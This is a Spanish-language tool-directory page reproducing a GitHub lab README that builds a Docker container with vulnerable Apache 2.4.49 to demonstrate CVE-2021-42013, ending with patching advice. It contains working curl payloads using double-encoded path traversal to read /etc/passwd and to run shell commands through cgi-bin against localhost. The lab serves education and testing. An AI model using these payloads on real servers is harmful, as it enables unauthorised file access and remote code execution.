Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
apache-cve-2021-42013-lab — Laboratorio que demuestra la vulnerabilidad de Apache HTTP Server 2.4.49 (CVE-2021-42013) en un entorno Docker. | Kitploit
Herramientas/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Laboratorio que demuestra la vulnerabilidad de Apache HTTP Server 2.4.49 (CVE-2021-42013) en un entorno Docker.

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Apache HTTP Server 2.4.49 Path Traversal y Ejecución Remota de Código (CVE-2021-42013)

Sobre el Proyecto

En este proyecto mostré la vulnerabilidad CVE-2021-42013 presente en Apache HTTP Server 2.4.49 en un entorno de laboratorio que creé usando Docker.

El objetivo es examinar en un entorno controlado cómo se origina la vulnerabilidad, cómo funciona y cuáles son sus efectos sobre el sistema.

Este trabajo ha sido preparado únicamente con fines educativos y de laboratorio.

Tecnologías Utilizadas

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

Estructura de Archivos del Proyecto

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

Requisitos

Antes de ejecutar el proyecto, deben estar instalados los siguientes elementos.

  • Docker Desktop
  • Git (opcional)

Instalación

Primero, descargue el repositorio en su computadora.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

Entre en la carpeta.

root@kitploit:~
cd apache-cve-2021-42013-lab

Cree la imagen de Docker.

root@kitploit:~
docker build -t apache-2.4.49-src .

Inicie el contenedor.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Entre dentro del contenedor.

root@kitploit:~
docker exec -it apache-src /bin/bash

Compruebe la versión de Apache.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Para salir del contenedor:

root@kitploit:~
exit

Comprobar los Módulos de Apache

Puede comprobar si el módulo CGI está habilitado con el siguiente comando.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

Habilitar el Módulo CGI

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Después, reinicie Apache.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

Para deshabilitar el módulo CGI:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

A continuación, reinicie de nuevo.

Prueba de la Vulnerabilidad

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Ejecución Remota de Código

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

Para ver más información del sistema:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

Resultado Esperado

Después de completar la instalación:

  • Apache 2.4.49 debería funcionar correctamente.
  • Cuando el módulo CGI está habilitado, la vulnerabilidad puede observarse.
  • Con Path Traversal se puede demostrar el acceso a archivos del sistema.
  • Con RCE se puede ver que es posible ejecutar comandos en el servidor.

Lógica de Funcionamiento de la Vulnerabilidad

root@kitploit:~
Cliente (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
Error de Normalización de URL
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Deshabilitado
      │                     │
      │                     ▼
      │             El acceso a archivos puede ser posible
      │
      ▼
CGI Activo
      │
      ▼
/bin/sh puede ejecutarse
      │
      ▼
Ejecución Remota de Código (RCE)

Para poder demostrar el escenario de RCE, es necesario habilitar el módulo mod_cgi.

Prevención

Para corregir esta vulnerabilidad, se recomienda actualizar Apache HTTP Server a la versión 2.4.51 o una más reciente. Además, si no se utiliza CGI, se recomienda deshabilitarlo y definir permisos de acceso adecuados únicamente para los directorios necesarios.

Descargar herramienta